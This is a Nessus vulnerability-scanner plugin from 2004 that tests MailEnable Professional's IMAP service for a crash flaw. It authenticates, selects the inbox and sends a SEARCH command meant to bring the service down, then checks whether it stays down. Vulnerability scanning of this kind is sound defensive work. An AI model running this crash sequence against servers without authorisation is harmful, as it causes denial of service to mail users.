#
# This script was written by George A. Theall, <theall@tifaware.com>.
#
# See the Nessus Scripts License for details.
#

if (description) {
  script_id(15487);
  script_version("$Revision: 1.1 $");

# script_cve_id("CVE-MAP-NOMATCH");
# NOTE: no CVE id assigned (gat, 10/2004)
  if (defined_func("script_xref")) {
    script_xref(name:"OSVDB", value:"10728");
  }

  name["english"] = "MailEnable Professional IMAP Service Search DoS Vulnerability";
  script_name(english:name["english"]);
 
  desc["english"] = "
The target is running at least one instance of MailEnable
Professional's IMAP service.  A flaw exists in versions 1.5a-d that
results in this service crashing if it receives a SEARCH command.  An
authenticated user could send this command either on purpose as a
denial of service attack or unwittingly since some IMAP clients, such
as IMP and Vmail, use it as part of the normal login process. 

Solution : Upgrade to MailEnable Professional 1.5e.

Risk factor : Medium";
  script_description(english:desc["english"]);
 
  summary["english"] = "Checks for Search DoS Vulnerability in MailEnable Professional IMAP Service";
  script_summary(english:summary["english"]);
 
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2004 George A. Theall");

  family["english"] = "Denial of Service";
  script_family(english:family["english"]);

  script_dependencie("find_service.nes", "global_settings.nasl");
  script_require_ports("Services/imap", 143);
  script_exclude_keys("imap/false_imap");
  script_require_keys("imap/login", "imap/password");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

user = get_kb_item("imap/login");
pass = get_kb_item("imap/password");
if ((user == "") || (pass == "")) {
  if (log_verbosity > 1) display("imap/login and/or imap/password are empty; skipped!\n");
  exit(1);
}

host = get_host_name();
# NB: MailEnable doesn't truly identify itself in the banner so we just
#     blindly login and do a search to try to bring down the service for
#     each open IMAP port that looks like it might be MailEnable.
ports = get_kb_list("Services/imap");
foreach port (ports) {
  banner = get_kb_item("imap/banner/" + port);
  if ("IMAP4rev1 server ready at" >< banner) {
    if (debug_level) display("debug: searching for Search DoS vulnerability in MailEnable Professional IMAP service on ", host, ":", port, ".\n");

    # Read banner.
    soc = open_sock_tcp(port);
    if (soc) {
      s = recv_line(socket:soc, length:1024);
      s = chomp(s);
      if (debug_level) display("debug: S: '", s, "'.\n");

      tag = 0;

      # Try to log in.
      ++tag;
      # nb: MailEnable 1.5d and lower appears to support only AUTH=LOGIN
      #     and AUTH=CRAM-MD5; we'll use the former here.
      c = string("a", string(tag), " AUTHENTICATE LOGIN");
      if (debug_level) display("debug: C: '", c, "'.\n");
      send(socket:soc, data:string(c, "\r\n"));
      s = recv_line(socket:soc, length:1024);
      s = chomp(s);
      if (debug_level) display("debug: S: '", s, "'.\n");
      if (s =~ "^\+ ") {
        s = s - "+ ";
        s = base64_decode(str:s);
        if ("User Name" >< s) {
          c = base64(str:user);
          if (debug_level) display("debug: C: '", c, "'.\n");
          send(socket:soc, data:string(c, "\r\n"));
          s = recv_line(socket:soc, length:1024);
          s = chomp(s);
          if (debug_level) display("debug: S: '", s, "'.\n");
          if (s =~ "^\+ ") {
            s = s - "+ ";
            s = base64_decode(str:s);
          }
          if ("Password" >< s) {
            c = base64(str:pass);
            if (debug_level) display("debug: C: '", c, "'.\n");
            send(socket:soc, data:string(c, "\r\n"));
          }
        }
      }
      while (s = recv_line(socket:soc, length:1024)) {
        s = chomp(s);
        if (debug_level) display("debug: S: '", s, "'.\n");
        m = eregmatch(pattern:string("^a", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
        if (!isnull(m)) {
          resp = m[1];
          break;
        }
        resp='';
      }

      # If successful, select the INBOX.
      if (resp && resp =~ "OK") {
        ++tag;
        c = string("a", string(tag), " SELECT INBOX");
        if (debug_level) display("debug: C: '", c, "'.\n");
        send(socket:soc, data:string(c, "\r\n"));
        while (s = recv_line(socket:soc, length:1024)) {
          s = chomp(s);
          if (debug_level) display("debug: S: '", s, "'.\n");
          m = eregmatch(pattern:string("^a", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
          if (!isnull(m)) {
            resp = m[1];
            break;
          }
          resp='';
        }

        # If successful, search it.
        if (resp && resp =~ "OK") {
          ++tag;
          c = string("a", string(tag), " SEARCH UNDELETED");
          if (debug_level) display("debug: C: '", c, "'.\n");
          send(socket:soc, data:string(c, "\r\n"));
          while (s = recv_line(socket:soc, length:1024)) {
            s = chomp(s);
            if (debug_level) display("debug: S: '", s, "'.\n");
            m = eregmatch(pattern:string("^a", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
            if (!isnull(m)) {
              resp = m[1];
              break;
            }
            resp='';
          }

          # If we don't get a response, make sure the service is truly down.
          if (!resp) {
            if (debug_level) display("debug: no response received.\n");
            close(soc);
            soc = open_sock_tcp(port);
            if (!soc) {
              if (debug_level) display("debug: imap service appears to be down.\n");
              security_warning(port);
              exit(0);
            }
            if (debug_level) display("debug: imap service is up -- huh?\n");
          }
        }
      }

      # Logout.
      ++tag;
      c = string("a", string(tag), " LOGOUT");
      if (debug_level) display("debug: C: '", c, "'.\n");
      send(socket:soc, data:string(c, "\r\n"));
      while (s = recv_line(socket:soc, length:1024)) {
        s = chomp(s);
        if (debug_level) display("debug: S: '", s, "'.\n");
        m = eregmatch(pattern:string("^a", string(tag), " (OK|BAD|NO)"), string:s, icase:TRUE);
        if (!isnull(m)) {
          resp = m[1];
          break;
        }
      }
      close(soc);
    }
  }
}
